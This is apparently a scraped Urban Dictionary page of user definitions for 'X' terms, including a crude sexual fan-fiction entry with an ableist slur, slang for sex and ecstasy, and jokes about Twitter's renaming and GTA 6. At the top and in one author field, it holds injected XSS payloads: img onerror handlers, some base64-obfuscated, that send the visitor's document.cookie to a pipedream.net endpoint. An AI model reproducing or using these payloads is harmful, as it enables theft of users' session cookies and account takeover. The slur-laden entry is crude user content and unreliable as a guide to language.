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">'><img src=x id=ZmV0Y2goJ2h0dHBzOi8vOTc5YTQxY2U0YTQzYTZiMTMwMjZhNGU2MjdjZWEwMmIubS5waXBlZHJlYW0ubmV0L2ltZ191cD9jb29raWU9Jytkb2N1bWVudC5jb29raWUrJy0tJytkb2N1bWVudC5kb21haW4p onerror=eval(atob(this.id))>

">'><img src=x id=ZmV0Y2goJ2h0dHBzOi8vOTc5YTQxY2U0YTQzYTZiMTMwMjZhNGU2MjdjZWEwMmIubS5waXBlZHJlYW0ubmV0L2ltZ191cD9jb29raWU9Jytkb2N1bWVudC5jb29raWUrJy0tJytkb2N1bWVudC5kb21haW4p onerror=eval(atob(this.id))>

This Is a "">'><img src=x id=ZmV0Y2goJ2h0dHBzOi8vOTc5YTQxY2U0YTQzYTZiMTMwMjZhNGU2MjdjZWEwMmIubS5waXBlZHJlYW0ubmV0L2ltZ191cD9jb29raWU9Jytkb2N1bWVudC5jb29raWUrJy0tJytkb2N1bWVudC5kb21haW4p onerror=eval(atob(this.id))>

by ">'><img src=x onerror=this.src='https://979a41ce4a43a6b13026a4e627cea02b.m.pipedream.net/my.urbandictionary.com/handle.php?cookie=' document.cookie '--' document.domain;this.removeAttribute('onerror'); > October 7, 2022

Luke X Charlie

Let me explain the characters and the relationship.

Luke: is a short muscular man that is retarded and rich.

Charlie: is a tall woman that likes waffles.
Sometimes she thinks that Luke dick is a waffle so sometimes she accidentally bites a little bit.

Luke: are you ready

Charlie: absolutely daddy

(Luke X Charlie)

by FNF faceless SpongeBob March 22, 2023


The X-Event is an experiment started by XGaster, and is the reason for Underverse's main point of conflict. It is the event created by whoever has a half or whole of the Overwrite soul, one who wants to create something new in the X Tale universe or the multiverse.

X-Chara: Welcome to the X-event

by Megalovania June 13, 2022

glitter x

a censored nickname for sex

tom- hey Leah I want to have glitter x with you

Leah- I want to have glitter x with you too

by coco Isaac scara November 1, 2024

X da C

It's a short way to say Ecstasy

You down to do sum X da C?

by Dirty68commie November 22, 2019

Twitter formely knows as X

A saying to mock jouranlists and newspaper reminding that "X is formely known as Twitter" in reports about X/Twitter. Defined by YouTube shitposter and YouTuber BlindHawk aka Novel Room.

Also, it mocks the name "X" because it was so bad that it immediately died as it launched with it.

"I posted something on Twitter formely knows as X."

by BravoMike1488 December 3, 2024

We got X before GTA 6

When something highly unusual and unexpected somehow happens before the hotly anticipated release of Grand Theft Auto 6.

The expression plays on consumers’ frustration with the video game’s drawn-out development by comparing it with random, goofy stuff that managed to “drop” before it.

We got Dream whimpering audio before GTA 6

(Example of “We got X before GTA 6”)

by enterprise1701 December 2, 2023

2👍 1👎